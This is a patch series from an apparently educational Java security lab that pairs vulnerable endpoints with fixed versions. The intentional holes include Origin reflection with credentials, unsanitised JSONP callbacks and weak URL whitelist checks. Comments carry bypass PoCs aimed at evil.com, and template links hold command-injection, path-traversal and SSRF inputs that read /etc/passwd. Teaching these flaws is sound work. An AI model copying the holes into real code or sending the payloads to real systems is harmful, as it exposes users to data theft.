diff --git a/src/main/java/org/joychou/config/CustomCorsConfig.java b/src/main/java/org/joychou/config/CustomCorsConfig.java
new file mode 100644
index 00000000..d18a285e
--- /dev/null
+++ b/src/main/java/org/joychou/config/CustomCorsConfig.java
@@ -0,0 +1,49 @@
+package org.joychou.config;
+
+import org.joychou.security.CustomCorsProcessor;
+import org.springframework.boot.autoconfigure.web.WebMvcRegistrationsAdapter;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.web.servlet.config.annotation.CorsRegistry;
+import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;
+import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter;
+import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
+
+@Configuration
+public class CustomCorsConfig extends WebMvcRegistrationsAdapter {
+
+    /**
+     * 设置cors origin白名单。区分http和https，并且默认不会拦截同域请求。
+     */
+    @Bean
+    public WebMvcConfigurer corsConfigurer() {
+        return new WebMvcConfigurerAdapter() {
+            @Override
+            public void addCorsMappings(CorsRegistry registry) {
+                // 支持一级域名，因为重写了checkOrigin
+                String[] allowOrigins = {"joychou.org", "http://test.joychou.me"};
+                registry.addMapping("/cors/sec/webMvcConfigurer") // /**表示所有路由path
+                        .allowedOrigins(allowOrigins)
+                        .allowedMethods("GET", "POST")
+                        .allowCredentials(true);
+            }
+        };
+    }
+
+
+    @Override
+    public RequestMappingHandlerMapping getRequestMappingHandlerMapping() {
+        return new CustomRequestMappingHandlerMapping();
+    }
+
+
+    /**
+     * 自定义Cors处理器
+     * 自定义校验origin，支持一级域名校验 && 多级域名
+     */
+    private static class CustomRequestMappingHandlerMapping extends RequestMappingHandlerMapping {
+        private CustomRequestMappingHandlerMapping() {
+            setCorsProcessor(new CustomCorsProcessor());
+        }
+    }
+}
diff --git a/src/main/java/org/joychou/controller/Cors.java b/src/main/java/org/joychou/controller/Cors.java
index db526a72..adb069a9 100644
--- a/src/main/java/org/joychou/controller/Cors.java
+++ b/src/main/java/org/joychou/controller/Cors.java
@@ -11,20 +11,20 @@
 import javax.servlet.http.HttpServletResponse;
 
 /**
- * @author  JoyChou (joychou@joychou.org)
- * @date    2018.10.24
- * @desc    https://github.com/JoyChou93/java-sec-code/wiki/CORS
+ * @author  JoyChou (joychou@joychou.org) @2018.10.24
+ * https://github.com/JoyChou93/java-sec-code/wiki/CORS
  */
 
 @RestController
 @RequestMapping("/cors")
 public class Cors {
 
-    protected static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
-    protected static String[] urlwhitelist = {"joychou.com", "joychou.me"};
+    private static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
+    private static String[] urlwhitelist = {"joychou.org", "joychou.me"};
+
 
     @RequestMapping("/vuln/origin")
-    private static String vuls1(HttpServletRequest request, HttpServletResponse response) {
+    public static String vuls1(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("origin");
         response.setHeader("Access-Control-Allow-Origin", origin); // 设置Origin值为Header中获取到的
         response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
@@ -32,7 +32,7 @@ private static String vuls1(HttpServletRequest request, HttpServletResponse resp
     }
 
     @RequestMapping("/vuln/setHeader")
-    private static String vuls2(HttpServletResponse response) {
+    public static String vuls2(HttpServletResponse response) {
         // 后端设置Access-Control-Allow-Origin为*的情况下，跨域的时候前端如果设置withCredentials为true会异常
         response.setHeader("Access-Control-Allow-Origin", "*");
         return info;
@@ -41,40 +41,67 @@ private static String vuls2(HttpServletResponse response) {
 
     @CrossOrigin("*")
     @RequestMapping("/vuln/crossOrigin")
-    private static String vuls3(HttpServletResponse response) {
+    public static String vuls3() {
+        return info;
+    }
+
+
+    /**
+     * 重写Cors的checkOrigin校验方法
+     * 支持自定义checkOrigin，让其额外支持一级域名
+     * 代码：org/joychou/security/CustomCorsProcessor
+     */
+    @CrossOrigin(origins = {"joychou.org", "http://test.joychou.me"})
+    @RequestMapping("/sec/crossOrigin")
+    public static String secCrossOrigin() {
         return info;
     }
 
 
-    // https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/webMvcConfigurer.java
+    /**
+     * WebMvcConfigurer设置Cors
+     * 支持自定义checkOrigin
+     * 代码：org/joychou/config/CorsConfig.java
+     */
     @RequestMapping("/sec/webMvcConfigurer")
     public CsrfToken getCsrfToken_01(CsrfToken token) {
         return token;
     }
 
 
-    // https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java
+    /**
+     * spring security设置cors
+     * 不支持自定义checkOrigin，因为spring security优先于setCorsProcessor执行
+     * 代码：org/joychou/security/WebSecurityConfig.java
+     */
     @RequestMapping("/sec/httpCors")
     public CsrfToken getCsrfToken_02(CsrfToken token) {
         return token;
     }
 
 
-    // https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/filter/SecCorsFilter.java
-    @RequestMapping("/sec/corsFitler")
+    /**
+     * 自定义filter设置cors
+     * 支持自定义checkOrigin
+     * 代码：org/joychou/filter/OriginFilter.java
+     */
+    @RequestMapping("/sec/originFilter")
     public CsrfToken getCsrfToken_03(CsrfToken token) {
         return token;
     }
 
 
-    // https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/filter/CorsFilter.java
-    @RequestMapping("/sec/Filter")
+    /**
+     * CorsFilter设置cors。
+     * 不支持自定义checkOrigin，因为corsFilter优先于setCorsProcessor执行
+     * 代码：org/joychou/filter/BaseCorsFilter.java
+     */
+    @RequestMapping("/sec/corsFilter")
     public CsrfToken getCsrfToken_04(CsrfToken token) {
         return token;
     }
 
 
-    // http://localhost:8080/cors/sec/checkOrigin
     @RequestMapping("/sec/checkOrigin")
     public String seccode(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("Origin");
diff --git a/src/main/java/org/joychou/filter/SecCorsFilter.java b/src/main/java/org/joychou/filter/BaseCorsFilter.java
similarity index 74%
rename from src/main/java/org/joychou/filter/SecCorsFilter.java
rename to src/main/java/org/joychou/filter/BaseCorsFilter.java
index 67493cb0..9987464f 100644
--- a/src/main/java/org/joychou/filter/SecCorsFilter.java
+++ b/src/main/java/org/joychou/filter/BaseCorsFilter.java
@@ -9,27 +9,26 @@
 
 /**
  * 由于CorsFilter和spring security冲突，所以改为下面的代码。
- * CorsFilter可以参考config/CorsConfig2的代码。
  */
 @Component
 @Order(Ordered.HIGHEST_PRECEDENCE)
-public class SecCorsFilter extends CorsFilter {
+public class BaseCorsFilter extends CorsFilter {
 
-    public SecCorsFilter() {
+    public BaseCorsFilter() {
         super(configurationSource());
     }
 
     private static UrlBasedCorsConfigurationSource configurationSource() {
         CorsConfiguration config = new CorsConfiguration();
         config.setAllowCredentials(true);
-        config.addAllowedOrigin("http://test.joychou.org");
-        config.addAllowedOrigin("https://test.joychou.org");
+        config.addAllowedOrigin("joychou.org"); // 不支持
+        config.addAllowedOrigin("http://test.joychou.me");
         config.addAllowedHeader("*");
         config.addAllowedMethod("GET");
         config.addAllowedMethod("POST");
 
         UrlBasedCorsConfigurationSource source = new UrlBasedCorsConfigurationSource();
-        source.registerCorsConfiguration("/cors/sec/corsFitler", config);
+        source.registerCorsConfiguration("/cors/sec/corsFilter", config);
 
         return source;
     }
diff --git a/src/main/java/org/joychou/filter/OriginFilter.java b/src/main/java/org/joychou/filter/OriginFilter.java
index 5f10c1a1..55ebf4a3 100644
--- a/src/main/java/org/joychou/filter/OriginFilter.java
+++ b/src/main/java/org/joychou/filter/OriginFilter.java
@@ -11,13 +11,13 @@
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
+
 /**
  * 推荐使用该全局方案修复Cors跨域漏洞，因为可以校验一级域名。
  * @author JoyChou @ 2019.12.19
- *
+ * 
  */
-
-@WebFilter(filterName = "OriginFilter", urlPatterns = "/cors/sec/Filter")
+@WebFilter(filterName = "OriginFilter", urlPatterns = "/cors/sec/originFilter")
 public class OriginFilter implements Filter {
 
     private static String[] urlwhitelist = {"joychou.org", "joychou.me"};
@@ -41,7 +41,10 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
 
         // 以file协议访问html，origin为字符串的null，所以依然会走安全check逻辑
         if ( origin != null && SecurityUtil.checkURLbyEndsWith(origin, urlwhitelist) == null) {
-            logger.error("[-] Origin check error.");
+            logger.error("[-] Origin check error. " + "Origin: " + origin +
+                    "\tCurrent url:" + request.getRequestURL());
+            response.setStatus(response.SC_FORBIDDEN);
+            response.getWriter().println("Invaid cors config by joychou.");
             return;
         }
 
diff --git a/src/main/java/org/joychou/security/CustomCorsProcessor.java b/src/main/java/org/joychou/security/CustomCorsProcessor.java
new file mode 100644
index 00000000..45e0451a
--- /dev/null
+++ b/src/main/java/org/joychou/security/CustomCorsProcessor.java
@@ -0,0 +1,60 @@
+package org.joychou.security;
+
+import org.apache.commons.lang.StringUtils;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.util.CollectionUtils;
+import org.springframework.web.cors.CorsConfiguration;
+import org.springframework.web.cors.DefaultCorsProcessor;
+
+import java.util.List;
+
+public class CustomCorsProcessor extends DefaultCorsProcessor {
+
+    private static final Logger logger = LoggerFactory.getLogger(CustomCorsProcessor.class);
+
+
+    /**
+     * 跨域请求，会通过此方法检测请求源是否被允许
+     *
+     * @param config        CORS 配置
+     * @param requestOrigin 请求源
+     * @return 如果请求源被允许，返回请求源；否则返回 null
+     */
+    @Override
+    protected String checkOrigin(CorsConfiguration config, String requestOrigin) {
+
+        // 支持checkOrigin原装的域名配置
+        String result = super.checkOrigin(config, requestOrigin);
+        if (result != null) {
+            return result;
+        }
+
+        List<String> allowedOrigins = config.getAllowedOrigins();
+        if (StringUtils.isBlank(requestOrigin)
+                || CollectionUtils.isEmpty(allowedOrigins)) {
+            return null;
+        }
+
+        return customCheckOrigin(allowedOrigins, requestOrigin);
+    }
+
+
+    /**
+     * 用host的endsWith来校验requestOrigin
+     */
+    private String customCheckOrigin(List<String> allowedOrigins, String requestOrigin) {
+
+        // list转String[]
+        String[] arrayAllowOrigins = allowedOrigins.toArray(new String[allowedOrigins.size()]);
+
+        if ( SecurityUtil.checkURLbyEndsWith(requestOrigin, arrayAllowOrigins) != null) {
+            logger.info("[+] Origin: "  + requestOrigin );
+            return requestOrigin;
+        }
+        logger.error("[-] Origin: " + requestOrigin );
+        return null;
+    }
+
+
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/security/WebSecurityConfig.java b/src/main/java/org/joychou/security/WebSecurityConfig.java
index 684e5513..27a332c3 100644
--- a/src/main/java/org/joychou/security/WebSecurityConfig.java
+++ b/src/main/java/org/joychou/security/WebSecurityConfig.java
@@ -62,7 +62,7 @@ protected void configure(HttpSecurity http) throws Exception {
                 .ignoringAntMatchers(csrfExcludeUrl)  // 不进行csrf校验的uri，多个uri使用逗号分隔
                 .csrfTokenRepository(new CookieCsrfTokenRepository());
         http.exceptionHandling().accessDeniedHandler(new CsrfAccessDeniedHandler());
-        // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());
+        // http.csrf().csrfTokenRepository(CookieCsrfTokenRepository.withHttpOnlyFalse());«
 
         http.cors();
 
@@ -85,8 +85,8 @@ CorsConfigurationSource corsConfigurationSource()
     {
         // Set cors origin white list
         ArrayList<String> allowOrigins = new ArrayList<String>();
-        allowOrigins.add("http://test.joychou.org");
-        allowOrigins.add("https://test.joychou.org"); // 区分http和https，并且默认不会拦截同域请求。
+        allowOrigins.add("joychou.org");
+        allowOrigins.add("https://test.joychou.me"); // 区分http和https，并且默认不会拦截同域请求。
 
         CorsConfiguration configuration = new CorsConfiguration();
         configuration.setAllowedOrigins(allowOrigins);
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index b57838db..18933862 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -10,7 +10,7 @@
     <p>
         <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
         <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
-        <a th:href="@{cors/sec/Filter}">Cors</a>&nbsp;&nbsp;
+        <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
         <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
         <a th:href="@{/sqli/jdbc/vul?username=joychou}">SqlInject</a>&nbsp;&nbsp;
         <a th:href="@{/ssrf/urlConnection?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;

From 9dd930e8a34c5145c970296ed8f5b40083e4f77d Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 17 Jan 2020 10:44:30 +0800
Subject: [PATCH 069/108] update some bugs
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

年前最后一次commit
---
 .../java/org/joychou/config/WebConfig.java    |  57 ++++++++--
 .../org/joychou/controller/FileUpload.java    |  37 +++++--
 .../org/joychou/controller/URLWhiteList.java  | 103 ++++++++----------
 .../org/joychou/controller/jsonp/JSONP.java   |  58 +++++-----
 .../java/org/joychou/filter/JsonpFilter.java  | 102 +++++++++++++++++
 .../java/org/joychou/filter/OriginFilter.java |   2 +-
 .../{HttpFilter.java => ReferFilter.java}     |  45 ++++----
 src/main/java/org/joychou/util/WebUtils.java  |   7 ++
 src/main/resources/application.properties     |   9 +-
 src/main/resources/templates/index.html       |   1 +
 10 files changed, 293 insertions(+), 128 deletions(-)
 create mode 100644 src/main/java/org/joychou/filter/JsonpFilter.java
 rename src/main/java/org/joychou/filter/{HttpFilter.java => ReferFilter.java} (62%)

diff --git a/src/main/java/org/joychou/config/WebConfig.java b/src/main/java/org/joychou/config/WebConfig.java
index cd4770d4..96d7f0f5 100644
--- a/src/main/java/org/joychou/config/WebConfig.java
+++ b/src/main/java/org/joychou/config/WebConfig.java
@@ -12,30 +12,59 @@
 @Component
 public class WebConfig {
 
-    private static Boolean referSecEnabled = false;
     private static String[] callbacks;
+    private static Boolean  jsonpReferCheckEnabled = false;
+    private static String[] jsonpRefererHost;
     private static String[] referWhitelist;
     private static String[] referUris;
+    private static Boolean referSecEnabled = false;
+    private static String businessCallback;
 
-    @Value("${joychou.security.referer.enabled}")
-    public void setReferSecEnabled(Boolean referSecEnabled){
-        WebConfig.referSecEnabled = referSecEnabled;
+    /**
+     * application.properties里object自动转jsonp的referer校验开关
+     * @param jsonpReferCheckEnabled jsonp校验开关
+     */
+    @Value("${joychou.security.jsonp.referer.check.enabled}")
+    public void setJsonpReferCheckEnabled(Boolean jsonpReferCheckEnabled){
+        WebConfig.jsonpReferCheckEnabled = jsonpReferCheckEnabled;
     }
-    public static Boolean getReferSecEnabled(){
-        return referSecEnabled;
+    public static Boolean getJsonpReferCheckEnabled(){
+        return jsonpReferCheckEnabled;
     }
 
 
     @Value("${joychou.security.jsonp.callback}")
-    public void setCallbacks(String[] callbacks){
+    public void setJsonpCallbacks(String[] callbacks){
         WebConfig.callbacks = callbacks;
     }
-    public static String[] getCallbacks(){
+    public static String[] getJsonpCallbacks(){
         return callbacks;
     }
 
 
-    @Value("${joychou.security.referer.hostwhitelist}")
+    /**
+     * application.properties里object自动转jsonp的referer白名单域名
+     * @param jsonpRefererHost 白名单域名，仅支持一级域名
+     */
+    @Value("${joychou.security.jsonp.referer.host}")
+    public void setJsonpReferWhitelist(String[] jsonpRefererHost){
+        WebConfig.jsonpRefererHost = jsonpRefererHost;
+    }
+    public static String[] getJsonpReferWhitelist(){
+        return jsonpRefererHost;
+    }
+
+
+    @Value("${joychou.security.referer.enabled}")
+    public void setReferSecEnabled(Boolean referSecEnabled){
+        WebConfig.referSecEnabled = referSecEnabled;
+    }
+    public static Boolean getReferSecEnabled(){
+        return referSecEnabled;
+    }
+
+
+    @Value("${joychou.security.referer.host}")
     public void setReferWhitelist(String[] referWhitelist){
         WebConfig.referWhitelist = referWhitelist;
     }
@@ -52,4 +81,14 @@ public void setReferUris(String[] referUris)
     public static String[] getReferUris(){
         return referUris;
     }
+
+
+    @Value("${joychou.business.callback}")
+    public void setBusinessCallback(String businessCallback){
+        WebConfig.businessCallback = businessCallback;
+    }
+    public static String getBusinessCallback(){
+        return businessCallback;
+    }
+
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index ac378219..77388816 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -1,6 +1,8 @@
 package org.joychou.controller;
 
 import com.fasterxml.uuid.Generators;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -23,7 +25,7 @@
 /**
  * @author  JoyChou (joychou@joychou.org)
  * @date    2018.08.15
- * @desc    Java file upload
+ * @desc    File upload
  */
 
 @Controller
@@ -32,6 +34,7 @@ public class FileUpload {
 
     // Save the uploaded file to this folder
     private static String UPLOADED_FOLDER = "/tmp/";
+    private final Logger logger= LoggerFactory.getLogger(this.getClass());
 
     @GetMapping("/")
     public String index() {
@@ -80,14 +83,13 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile,
             return "redirect:/file/status";
         }
 
-        // get suffix
         String fileName = multifile.getOriginalFilename();
-        String Suffix = fileName.substring(fileName.lastIndexOf("."));
-
+        String Suffix = fileName.substring(fileName.lastIndexOf(".")); // 获取文件后缀名
+        String mimeType = multifile.getContentType(); // 获取MIME类型
         File excelFile = convert(multifile);
 
-        // security check
-        String picSuffixList[] = {".jpg", ".png", ".jpeg", ".gif", ".bmp"};
+        // 判断文件后缀名是否在白名单内
+        String picSuffixList[] = {".jpg", ".png", ".jpeg", ".gif", ".bmp"};  // 后缀名白名单
         Boolean suffixFlag = false;
         for (String white_suffix : picSuffixList) {
             if (Suffix.toLowerCase().equals(white_suffix)) {
@@ -95,7 +97,28 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile,
                 break;
             }
         }
-        if ( !suffixFlag || !isImage(excelFile) ) {
+
+        if (!suffixFlag) {
+            logger.error("[-] Suffix error: " + Suffix);
+        }
+
+        String mimeTypeBlackList[] = {"text/html"}; // 不允许传html
+
+        Boolean mimeBlackFlag = false;
+        for (String blackMimeType : mimeTypeBlackList) {
+            if (mimeType.equalsIgnoreCase(blackMimeType) ) {
+                mimeBlackFlag = true;
+                logger.error("[-] Mime type error: " + mimeType);
+                break;
+            }
+        }
+
+        boolean isImageFlag = isImage(excelFile);
+
+        if( !isImageFlag ){
+            logger.error("[-] File is not Image");
+        }
+        if ( !suffixFlag || mimeBlackFlag || !isImageFlag ) {
             redirectAttributes.addFlashAttribute("message", "illeagl picture");
             deleteFile(excelFile);
             return "redirect:/file/status";
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index 94df0400..159351cb 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -1,11 +1,10 @@
 package org.joychou.controller;
 
 
-import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.ResponseBody;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.web.bind.annotation.*;
 
-import javax.servlet.http.HttpServletRequest;
 import java.net.URI;
 import java.net.URL;
 import java.util.ArrayList;
@@ -20,22 +19,20 @@
  * @version   2018.08.23
  */
 
-@Controller
+@RestController
 @RequestMapping("/url")
 public class URLWhiteList {
 
 
     private String domainwhitelist[] = {"joychou.org", "joychou.com"};
-
+    private static final Logger logger = LoggerFactory.getLogger(URLWhiteList.class);
     /**
      * bypass poc: bypassjoychou.org
-     * http://localhost:8080/url/endswith?url=http://aaajoychou.org
+     * http://localhost:8080/url/vuln/endswith?url=http://aaajoychou.org
      *
      */
-    @RequestMapping("/endswith")
-    @ResponseBody
-    public String endsWith(HttpServletRequest request) throws Exception{
-        String url = request.getParameter("url");
+    @GetMapping("/vuln/endsWith")
+    public String endsWith(@RequestParam("url") String url) throws Exception{
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
 
@@ -47,15 +44,15 @@ public String endsWith(HttpServletRequest request) throws Exception{
         return "Bad url.";
     }
 
+
     /**
      * bypass poc: joychou.org.bypass.com or bypassjoychou.org.
-     * http://localhost:8080/url/contains?url=http://joychou.org.bypass.com http://bypassjoychou.org
+     * http://localhost:8080/url/vuln/contains?url=http://joychou.org.bypass.com
+     * http://localhost:8080/url/vuln/contains?url=http://bypassjoychou.org
      *
      */
-    @RequestMapping("/contains")
-    @ResponseBody
-    public String contains(HttpServletRequest request) throws Exception{
-        String url = request.getParameter("url");
+    @GetMapping("/vuln/contains")
+    public String contains(@RequestParam("url") String url) throws Exception{
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
 
@@ -70,13 +67,11 @@ public String contains(HttpServletRequest request) throws Exception{
 
     /**
      * bypass poc: bypassjoychou.org. It's the same with endsWith.
-     * http://localhost:8080/url/regex?url=http://aaajoychou.org
+     * http://localhost:8080/url/vuln/regex?url=http://aaajoychou.org
      *
      */
-    @RequestMapping("/regex")
-    @ResponseBody
-    public String regex(HttpServletRequest request) throws Exception{
-        String url = request.getParameter("url");
+    @GetMapping("/vuln/regex")
+    public String regex(@RequestParam("url") String url) throws Exception{
         URL u = new URL(url);
         String host = u.getHost().toLowerCase();
 
@@ -92,15 +87,14 @@ public String regex(HttpServletRequest request) throws Exception{
 
     /**
      * bypass poc: joychou.org.bypass.com or bypassjoychou.org. It's the same with contains.
-     * http://localhost:8080/url/indexof?url=http://joychou.org.bypass.com http://bypassjoychou.org
+     * http://localhost:8080/url/vuln/indexOf?url=http://joychou.org.bypass.com http://bypassjoychou.org
      *
      */
-    @RequestMapping("/indexof")
-    @ResponseBody
-    public String indexOf(HttpServletRequest request) throws Exception{
-        String url = request.getParameter("url");
+    @GetMapping("/vuln/indexOf")
+    public String indexOf(@RequestParam("url") String url) throws Exception{
         URL u = new URL(url);
         String host = u.getHost();
+
         // If indexOf returns -1, it means that no string was found.
         for (String domain: domainwhitelist){
             if (host.indexOf(domain) != -1) {
@@ -113,16 +107,14 @@ public String indexOf(HttpServletRequest request) throws Exception{
     /**
      * The bypass of using java.net.URL to getHost.
      *
-     * Bypass poc1: curl -v 'http://localhost:8080/url/url_bypass?url=http://evel.com%5c@www.joychou.org/a.html'
-     * Bypass poc2: curl -v 'http://localhost:8080/url/url_bypass?url=http://evil.com%5cwww.joychou.org/a.html'
+     * Bypass poc1: curl -v 'http://localhost:8080/url/vuln/url_bypass?url=http://evel.com%5c@www.joychou.org/a.html'
+     * Bypass poc2: curl -v 'http://localhost:8080/url/vuln/url_bypass?url=http://evil.com%5cwww.joychou.org/a.html'
      *
      * Detail: https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass
      */
-    @RequestMapping("/url_bypass")
-    @ResponseBody
-    public String url_bypass(HttpServletRequest request) throws Exception{
-        String url = request.getParameter("url");
-        System.out.println("url:  " + url);
+    @GetMapping("/vuln/url_bypass")
+    public String url_bypass(@RequestParam("url") String url) throws Exception{
+        logger.info("url:  " + url);
         URL u = new URL(url);
 
         if (!u.getProtocol().startsWith("http") && !u.getProtocol().startsWith("https")) {
@@ -130,7 +122,7 @@ public String url_bypass(HttpServletRequest request) throws Exception{
         }
 
         String host = u.getHost().toLowerCase();
-        System.out.println("host:  " + host);
+        logger.info("host:  " + host);
 
         // endsWith .
         for (String domain: domainwhitelist){
@@ -145,18 +137,16 @@ public String url_bypass(HttpServletRequest request) throws Exception{
 
 
     /**
-     * First-level host whitelist.
-     * http://localhost:8080/url/seccode1?url=http://aa.taobao.com
+     * 一级域名白名单 First-level host whitelist.
+     * http://localhost:8080/url/sec/endswith?url=http://aa.joychou.org
      *
      */
-    @RequestMapping("/seccode1")
-    @ResponseBody
-    public String seccode1(HttpServletRequest request) throws Exception{
+    @GetMapping("/sec/endswith")
+    public String sec_endswith(@RequestParam("url") String url) throws Exception{
 
-        String whiteDomainlists[] = {"taobao.com", "tmall.com"};
-        String url = request.getParameter("url");
+        String whiteDomainlists[] = {"joychou.org", "joychou.com"};
 
-        URI uri = new URI(url);
+        URI uri = new URI(url); // 必须用URI
         if (!url.startsWith("http://") && !url.startsWith("https://")) {
             return "SecurityUtil is not http or https";
         }
@@ -174,15 +164,13 @@ public String seccode1(HttpServletRequest request) throws Exception{
     }
 
     /**
-     * Muti-level host whitelist.
-     * http://localhost:8080/url/seccode2?url=http://ccc.bbb.taobao.com
+     * 多级域名白名单 Multi-level host whitelist.
+     * http://localhost:8080/url/sec/multi_level_hos?url=http://ccc.bbb.joychou.org
      *
      */
-    @RequestMapping("/seccode2")
-    @ResponseBody
-    public String seccode2(HttpServletRequest request) throws Exception{
-        String whiteDomainlists[] = {"aaa.taobao.com", "ccc.bbb.taobao.com"};
-        String url = request.getParameter("url");
+    @GetMapping("/sec/multi_level_host")
+    public String sec_multi_level_host(@RequestParam("url") String url) throws Exception{
+        String whiteDomainlists[] = {"aaa.joychou.org", "ccc.bbb.joychou.org"};
 
         URI uri = new URI(url);
         if (!url.startsWith("http://") && !url.startsWith("https://")) {
@@ -199,21 +187,20 @@ public String seccode2(HttpServletRequest request) throws Exception{
         return "Bad url.";
     }
 
+
     /**
-     * Muti-level host whitelist.
-     * http://localhost:8080/url/seccode3?url=http://ccc.bbb.taobao.com
+     * 多级域名白名单 Multi-level host whitelist.
+     * http://localhost:8080/url/sec/array_indexOf?url=http://ccc.bbb.joychou.org
      *
      */
-    @RequestMapping("/seccode3")
-    @ResponseBody
-    public String seccode3(HttpServletRequest request) throws Exception{
+    @GetMapping("/sec/array_indexOf")
+    public String sec_array_indexOf(@RequestParam("url") String url) throws Exception{
 
         // Define muti-level host whitelist.
-        ArrayList<String> whiteDomainlists = new ArrayList<String>();
-        whiteDomainlists.add("bbb.taobao.com");
-        whiteDomainlists.add("ccc.bbb.taobao.com");
+        ArrayList<String> whiteDomainlists = new ArrayList<>();
+        whiteDomainlists.add("bbb.joychou.org");
+        whiteDomainlists.add("ccc.bbb.joychou.org");
 
-        String url = request.getParameter("url");
         URI uri = new URI(url);
 
         if (!url.startsWith("http://") && !url.startsWith("https://")) {
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index a5c9072f..da2474fa 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -10,6 +10,8 @@
 import org.springframework.web.bind.annotation.*;
 import org.springframework.web.servlet.ModelAndView;
 import org.springframework.web.servlet.view.json.MappingJackson2JsonView;
+import org.joychou.config.WebConfig;
+import org.joychou.util.WebUtils;
 
 import javax.servlet.http.HttpServletRequest;
 import java.security.Principal;
@@ -22,12 +24,13 @@
  * https://github.com/JoyChou93/java-sec-code/wiki/JSONP
  */
 
+
 @RestController
 @RequestMapping("/jsonp")
 public class JSONP {
 
     private static String[] urlwhitelist = {"joychou.com", "joychou.org"};
-
+    private static String callback = WebConfig.getBusinessCallback();
 
     // get current login username
     public static String getUserInfo2JsonStr(HttpServletRequest request) {
@@ -44,54 +47,53 @@ public static String getUserInfo2JsonStr(HttpServletRequest request) {
     /**
      * Set the response content-type to application/javascript.
      * <p>
-     * http://localhost:8080/jsonp/referer?callback=test
+     * http://localhost:8080/jsonp/vuln/referer?callback_=test
      */
-    @RequestMapping(value = "/referer", produces = "application/javascript")
-    private String referer(HttpServletRequest request) {
-        String callback = request.getParameter("callback");
-        return callback + "(" + getUserInfo2JsonStr(request) + ")";
+    @RequestMapping(value = "/vuln/referer", produces = "application/javascript")
+    public String referer(HttpServletRequest request) {
+        String callback = request.getParameter(this.callback);
+        return WebUtils.json2Jsonp(callback, getUserInfo2JsonStr(request));
     }
 
     /**
      * Direct access does not check Referer, non-direct access check referer.
      * Developer like to do jsonp testing like this.
      * <p>
-     * http://localhost:8080/jsonp/emptyReferer?callback=test
+     * http://localhost:8080/jsonp/vuln/emptyReferer?callback_=test
      */
-    @RequestMapping(value = "/emptyReferer", produces = "application/javascript")
-    private String emptyReferer(HttpServletRequest request) {
+    @RequestMapping(value = "/vuln/emptyReferer", produces = "application/javascript")
+    public String emptyReferer(HttpServletRequest request) {
         String referer = request.getHeader("referer");
 
         if (null != referer && SecurityUtil.checkURLbyEndsWith(referer, urlwhitelist) == null) {
             return "error";
         }
-
-        String callback = request.getParameter("callback");
-        return callback + "(" + getUserInfo2JsonStr(request) + ")";
+        String callback = request.getParameter(this.callback);
+        return WebUtils.json2Jsonp(callback, getUserInfo2JsonStr(request));
     }
 
     /**
      * Adding callback or cback on parameter can automatically return jsonp data.
-     * http://localhost:8080/jsonp/advice?callback=test
-     * http://localhost:8080/jsonp/advice?_callback=test
+     * http://localhost:8080/jsonp/vuln/advice?callback=test
+     * http://localhost:8080/jsonp/vuln/advice?_callback=test
      *
      * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully.
      * Such as JSONOjbect or JavaBean. String type cannot be used.
      */
-    @RequestMapping(value = "/advice", produces = MediaType.APPLICATION_JSON_VALUE)
+    @RequestMapping(value = "/vuln/advice", produces = MediaType.APPLICATION_JSON_VALUE)
     public JSONObject advice(HttpServletRequest request) {
         return JSON.parseObject(getUserInfo2JsonStr(request));
     }
 
 
     /**
